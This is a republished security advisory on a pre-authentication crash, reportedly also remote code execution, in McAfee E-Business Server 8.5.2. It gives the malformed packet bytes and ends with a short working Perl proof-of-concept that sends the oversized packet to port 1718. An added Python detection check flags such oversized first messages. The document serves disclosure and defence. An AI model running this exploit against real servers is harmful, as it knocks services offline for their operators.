McAfee E-Business Server "guards sensitive corporate data with industry-standard PGP 128-bit encryption and authentication. McAfee E-Business Server supports a variety of platforms and security certificates". It is possible to crash McAfee's E-Business Server by sending a malicious packet to its TCP port 1718.
Credit:
The information has been provided by Leon Juranic.
The original article can be found at: http://www.infigo.hr/en/in_focus/advisories/INFIGO-2008-01-06
Vulnerable Systems:
* McAfee E-Business Server version 8.5.2
It is possible to crash McAfee E-Business Server during the authentication process. When a malformed (oversized) initial authentication packet is sent to E-Business Server, the server will crash, and will have to be manually restarted.
A malformed authentication packet is shown below:
"\x01\x3f\x2f\x05\x25\x2a" + "A" * 69953
McAfee further researched the vulnerability and confirmed that it allows an attacker to also remotely execute code.
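An added detection example (not from the advisory or the vendor): a Python check that flags a connection to TCP port 1718 whose first client message, measured across TCP segments because a packet of this size never arrives in one segment, is oversized or consists mostly of filler. The thresholds, the `Segment` record and the sample streams are assumptions constructed for illustration; the advisory does not state the size of a legitimate authentication message.

```python
from dataclasses import dataclass

EBS_PORT = 1718        # TCP port named in the advisory
MAX_AUTH_BYTES = 4096  # ASSUMED ceiling for a legitimate first message; tune per site
MAX_FILL_RUN = 256     # ASSUMED limit on a run of one repeated byte value

@dataclass
class Segment:
    dst_port: int      # 1718 means client -> server, anything else is a reply
    payload: bytes

def check_stream(segments):
    """Measure what the client sends before the server's first reply.

    Counts bytes and the longest single-byte run across segment boundaries
    without buffering the stream, and returns a list of findings."""
    total = best = run = 0
    prev = None
    for seg in segments:
        if seg.dst_port != EBS_PORT:
            if total:
                break          # server answered: the first message is complete
            continue           # server spoke first; keep waiting for the client
        total += len(seg.payload)
        for b in seg.payload:
            run = run + 1 if b == prev else 1
            prev = b
            best = max(best, run)
    findings = []
    if total > MAX_AUTH_BYTES:
        findings.append(f"oversized first message: {total} bytes")
    if best > MAX_FILL_RUN:
        findings.append(f"filler run of {best} identical bytes")
    return findings

def split(data, port=EBS_PORT, mss=1460):
    """Cut data into MSS-sized segments, as it would appear on the wire."""
    return [Segment(port, data[i:i + mss]) for i in range(0, len(data), mss)]

# Constructed sample streams (not captured traffic).
NORMAL = (split(bytes(range(120)))          # short first message
          + [Segment(40000, b"OK")]         # server reply ends the first message
          + split(b"B" * 100000))           # later bulk data, not counted
OVERSIZED = split(b"H" * 6 + b"A" * 69953)  # same total size as the advisory's packet

if __name__ == "__main__":
    for name, stream in (("normal", NORMAL), ("oversized", OVERSIZED)):
        print(name, check_stream(stream) or "clean")
```

A per-packet size rule would miss this case, since each segment on the wire is no larger than the MSS; the check has to be made on the reassembled first message.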
Solution:
The vendor addressed this vulnerability with an E-Business Server patch update on January 8th, 2008.
Vendor advisory and update link:
https://knowledge.mcafee.com/SupportSite/dynamickc.do?externalId=614472&sliceId=SAL_Public&command=show&forward=nonthreadedKC&kcId=614472
Exploit:
#!/usr/bin/perl
#
#
# McAfee(R) E-Business Server(TM) 8.5.2 Remote preauth crash (PoC) - http://www.infigo.hr/files/mcafee2.pl
#
# - tested on Windows and Linux
#
#
# Leon Juranic <leon.juranic@infigo.hr>,
# Infigo IS <http://www.infigo.hr/en/>
#
use IO::Socket;
$saddr = "192.168.1.3";
$sport = 1718;
$exp1 = "\x01\x3f\x2f\x05\x25\x2a" . "A" x 69953;
print "> Sending exploit string...\n";
my $server_sock = IO::Socket::INET->new (PeerAddr => $saddr, PeerPort => $sport) || die ("Cannot connect to server!!!\n\n");
print $server_sock $exp1;